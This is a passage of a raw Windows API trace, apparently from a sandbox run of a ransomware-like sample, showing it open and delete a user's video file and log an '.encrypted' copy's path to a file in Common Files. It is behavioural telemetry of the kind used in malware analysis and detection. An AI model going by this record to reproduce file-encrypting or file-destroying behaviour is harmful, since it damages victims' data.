dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.702] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf402ab30, ftCreationTime.dwHighDateTime=0x1d5b99c, ftLastAccessTime.dwLowDateTime=0xc154a40, ftLastAccessTime.dwHighDateTime=0x1d5ba8b, ftLastWriteTime.dwLowDateTime=0xc154a40, ftLastWriteTime.dwHighDateTime=0x1d5ba8b, nFileSizeHigh=0x0, nFileSizeLow=0x1667d, dwReserved0=0x0, dwReserved1=0x777648, cFileName="Ou4nOp2hd11P9km.swf", cAlternateFileName="OU4NOP~1.SWF")) returned 0x7c2240 [0043.702] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0043.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0043.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0043.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0043.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.702] CharLowerBuffW (in: lpsz="byte[91773]", cchLength=0xb | out: lpsz="byte[91773]") returned 0xb [0043.703] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0043.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0043.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0043.703] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0043.703] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0043.703] FreeLibrary (hLibModule=0x76b40000) returned 1 [0043.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0043.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0043.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0043.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0043.703] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0043.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0043.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0043.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0043.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0043.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0043.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0043.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0043.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0043.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0043.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0043.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0043.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0043.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0043.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0043.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0043.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0043.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0043.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0043.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0043.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.704] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0043.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0043.704] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0043.704] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0043.704] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.705] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\ou4nop2hd11p9km.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0043.705] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.705] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0043.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0043.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0043.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0043.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0043.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0043.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0043.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0043.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0043.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0043.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0043.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0043.706] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0043.706] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0043.706] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.706] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.706] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.707] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0043.707] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.707] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0043.707] FreeLibrary (hLibModule=0x76e10000) returned 1 [0043.707] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf", lpFilePart=0x0) returned 0x4c [0043.707] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf402ab30, ftCreationTime.dwHighDateTime=0x1d5b99c, ftLastAccessTime.dwLowDateTime=0xc154a40, ftLastAccessTime.dwHighDateTime=0x1d5ba8b, ftLastWriteTime.dwLowDateTime=0x19c2d140, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1667d, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="Ou4nOp2hd11P9km.swf", cAlternateFileName="OU4NOP~1.SWF")) returned 0x7c2240 [0043.707] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\ou4nop2hd11p9km.swf")) returned 1 [0043.709] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf402ab30, ftCreationTime.dwHighDateTime=0x1d5b99c, ftLastAccessTime.dwLowDateTime=0xc154a40, ftLastAccessTime.dwHighDateTime=0x1d5ba8b, ftLastWriteTime.dwLowDateTime=0x19c2d140, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x1667d, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="Ou4nOp2hd11P9km.swf", cAlternateFileName="OU4NOP~1.SWF")) returned 0 [0043.709] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0043.709] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.709] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0043.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0043.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0043.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0043.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0043.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0043.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0043.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0043.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0043.709] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0043.709] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0043.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0043.709] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0043.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.709] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.710] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0043.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0043.710] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0043.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0043.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.710] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0043.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0043.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0043.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0043.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0043.710] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0043.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0043.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0043.710] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0043.710] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.710] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0043.710] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.710] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0043.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0043.710] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0043.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.711] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0043.711] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x38c8, lpOverlapped=0x0) returned 1 [0043.711] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0043.711] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x38c8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.711] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0043.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0043.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0043.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.encrypted.swf\r\n", cchWideChar=89, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 89 [0043.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x59) returned 0x87a9d8 [0043.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.encrypted.swf\r\n", cchWideChar=89, lpMultiByteStr=0x87a9d8, cbMultiByte=89, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.encrypted.swf\r\n", lpUsedDefaultChar=0x0) returned 89 [0043.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0043.711] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87aa40 [0043.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0043.711] WriteFile (in: hFile=0x128, lpBuffer=0x87aa40*, nNumberOfBytesToWrite=0x58, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x87aa40*, lpNumberOfBytesWritten=0x6aee3c*=0x58, lpOverlapped=0x0) returned 1 [0043.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0043.711] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0043.711] CloseHandle (hObject=0x128) returned 1 [0043.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0043.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0043.712] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0043.716] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0043.716] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0043.716] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0043.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0043.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0043.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0043.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0043.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0043.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0043.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0043.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0043.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0043.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0043.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0043.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0043.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0043.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0043.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0043.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0043.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0043.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0043.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0043.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0043.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0043.717] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0043.717] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: 